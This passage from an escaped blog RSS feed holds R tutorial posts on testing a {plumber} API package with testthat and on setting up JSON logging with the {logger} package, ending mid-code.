&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test_path() will give appropriate path to running test environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_path&lt;/span&gt;(path)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# read a file from disk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; obj &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;readLines&lt;/span&gt;(file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# turn json contents into a single string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(obj, collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="testing-tests"&gt;Testing: Tests&lt;/h2&gt;
&lt;p&gt;With all of the setup work done (at least we only need to do that once)
we will finally write tests to address the three types identified
earlier in the article. We identified three scenarios for JSON we might
receive, so we can go ahead and stick those in a data folder within our
test directory.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└── tests
├── testthat
│ ├── example_data
│ │ ├── array.json
│ │ ├── array_objects.json
│ │ └── single_object.json
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Our test script for this endpoint then, will iterate through the files
in this directory and:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Send each example as the body of a POST request and ensure we get a
success response (200)&lt;/li&gt;
&lt;li&gt;Send a mock request object to the wrapper function, ensuring that
data is being parsed correctly and the return object is of the right
shape&lt;/li&gt;
&lt;li&gt;Take the data from the example file, run it through the &lt;code&gt;my_sum()&lt;/code&gt;
function and ensure that the result is correct&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/test-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# iterate through multiple test cases&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pwalk&lt;/span&gt;(tibble&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# get all files in the test data directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_path&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;example_data&amp;#34;&lt;/span&gt;), full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# expected length (shape) of result&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# expected sums&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sums &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;), &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(file, length, sums){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use our helper to create the POST body&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; test_case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_case_json&lt;/span&gt;(file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test against running API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;succesful api response&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# skip if not running&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;skip_dead_api&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_headers&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Accept &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application/json&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Content-Type&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application/json&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use our helper to send the data to the correct endpoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;api_post&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/example/sum&amp;#34;&lt;/span&gt;, body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; test_case, headers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; headers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# check our expectation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;status_code, &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test that the wrapper is doing its job&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;successful api func&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use helper to create fake request object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_fake_post&lt;/span&gt;(test_case)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# execute the function which is exposed as a route directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;api_sum&lt;/span&gt;(input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# check the output has the expected shape&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_length&lt;/span&gt;(res, length)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test the business logic of the function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;successful sum&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use the data parsed from the test case&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(test_case)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# execute the logic function directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;my_sum&lt;/span&gt;(input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# check the result equals our expectation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(res, sums)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="concluding-remarks"&gt;Concluding remarks&lt;/h2&gt;
&lt;p&gt;With that we have a setup for our test suite that takes care of a number
of common elements, which can of course be expanded for other HTTP
methods, data types etc; and a consistent approach to testing many cases
at the API service level, serialization/parsing and logic level. As with
the other posts in this series a dedicated package example is available
in our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-api-as-package-testing" rel="external"&gt;blogs
repo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-testing/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>API as a package: Logging</title><link>https://www.jumpingrivers.com/blog/api-as-a-package-logging/</link><pubDate>Thu, 22 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/api-as-a-package-logging/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-logging/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/api-as-a-package-logging/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-structure" rel="external"&gt;Part 1: API as a package: Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: API as a package: Logging (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-testing/" rel="external"&gt;Part 3: API as a package: Testing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-structure" rel="external"&gt;Part 1&lt;/a&gt; of this series laid out some ideas for how one might structure a &lt;a href="https://www.rplumber.io/" rel="external"&gt;{plumber}&lt;/a&gt; application as an R package, inspired
by solutions such as &lt;a href="https://thinkr-open.github.io/golem/" rel="external"&gt;{golem}&lt;/a&gt; and &lt;a href="https://leprechaun.opifex.org/" rel="external"&gt;{leprechaun}&lt;/a&gt; for &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;{shiny}&lt;/a&gt;. In this installment of the series
we look at adding some functions to our package that will take care of logging as our application runs. If you haven&amp;rsquo;t already, we recommend reading the first installment
of this series as the example package created for that post will form the basis of the starting point for this one.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-api-as-a-package-logging"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="getting-started"&gt;Getting started&lt;/h2&gt;
&lt;p&gt;There are numerous packages for logging in the R programming language; one of our favourites is &lt;a href="https://daroczig.github.io/logger/" rel="external"&gt;{logger}&lt;/a&gt; as
it provides a host of useful functions out of the box, yet it remains easily customisable. If you are not familiar with {logger}
we highly recommend reading the articles on the &lt;a href="https://daroczig.github.io/logger/" rel="external"&gt;packagedown site&lt;/a&gt; for it.&lt;/p&gt;
&lt;h3 id="persistant-logging"&gt;Persistant logging&lt;/h3&gt;
&lt;p&gt;For a deployed application, it is crucial that log messages are persisted to disk. When publishing on &lt;del&gt;RStudio&lt;/del&gt; &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; Connect here
at Jumping Rivers we like our log messages to both display in the console (as they can be quickly viewed from the web interface) and be persisted to disk
for future recovery. The {logger} package makes this trivial to do using the &lt;code&gt;logger::appender_tee()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To set your logger to one that both displays in the console and persists to disk on a rotating log file basis we could do something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(logger)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;log&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_appender&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;appender_tee&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# set of 20 rotating log files, each with at most 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# lines in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file, max_lines &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2000L&lt;/span&gt;, max_files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20L&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By rotating log files, we prevent the log files consuming an increasing amount of storage at the expense of overwriting older logs.&lt;/p&gt;
&lt;h3 id="formatting"&gt;Formatting&lt;/h3&gt;
&lt;p&gt;There are numerous file formats that could be used for logging, but JSON is a decent choice as it is fairly ubiquitous. The {logger}
package provides a formatter function for this purpose already &lt;code&gt;logger::formatter_json()&lt;/code&gt; which can be set as the default formatter. This will simply
capture the data sent in a log request as a list and apply &lt;code&gt;jsonlite::toJSON()&lt;/code&gt; to it.&lt;/p&gt;
&lt;p&gt;The formatter is responsible for converting data into something that can be used for a log message. For organising this data and generating actual records we need a
layout function. {logger} does provide a &lt;code&gt;logger::layout_json()&lt;/code&gt; however for this application we found it to be not quite perfect. This was because we wanted to
be able to log bits of data that were received in requests to the API. Using the provided layout function we found that this would stringify the JSON object received in a
POST request, for example, and made it more difficult to do any processing of log files afterwards. For example&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_formatter&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;formatter_json)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_layout&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_json&lt;/span&gt;(fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;level&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;msg&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_appender&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;appender_stdout)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;foo&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;z &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;42&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;msg&amp;#34;:&amp;#34;{\&amp;#34;1\&amp;#34;:\&amp;#34;foo\&amp;#34;,\&amp;#34;y\&amp;#34;:\&amp;#34;bar\&amp;#34;}&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(request &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;meaning of life&amp;#34;&lt;/span&gt;, response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; z)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;msg&amp;#34;:&amp;#34;{\&amp;#34;request\&amp;#34;:\&amp;#34;meaning of life\&amp;#34;,\&amp;#34;response\&amp;#34;:42}&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To solve this we wrote a slightly modified version which allows arbitrary objects to be passed through
to the logger. {logger} has some handy &lt;a href="https://daroczig.github.io/logger/articles/customize_logger.html" rel="external"&gt;information&lt;/a&gt; on writing customisations for your logger objects.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;layout_json_custom &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;time&amp;#34;&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;force&lt;/span&gt;(fields)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# structure to match the logger documented requirements&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# for custom layout functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;structure&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; level, msg, namespace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA_character_&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .logcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sys.call&lt;/span&gt;(), .topcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sys.call&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .topenv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;parent.frame&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_logger_meta_variables&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; log_level &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; level, namespace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; namespace,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .logcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .logcall, .topcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .topcall,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .topenv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .topenv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# take the message data passed in by the &lt;/span&gt;
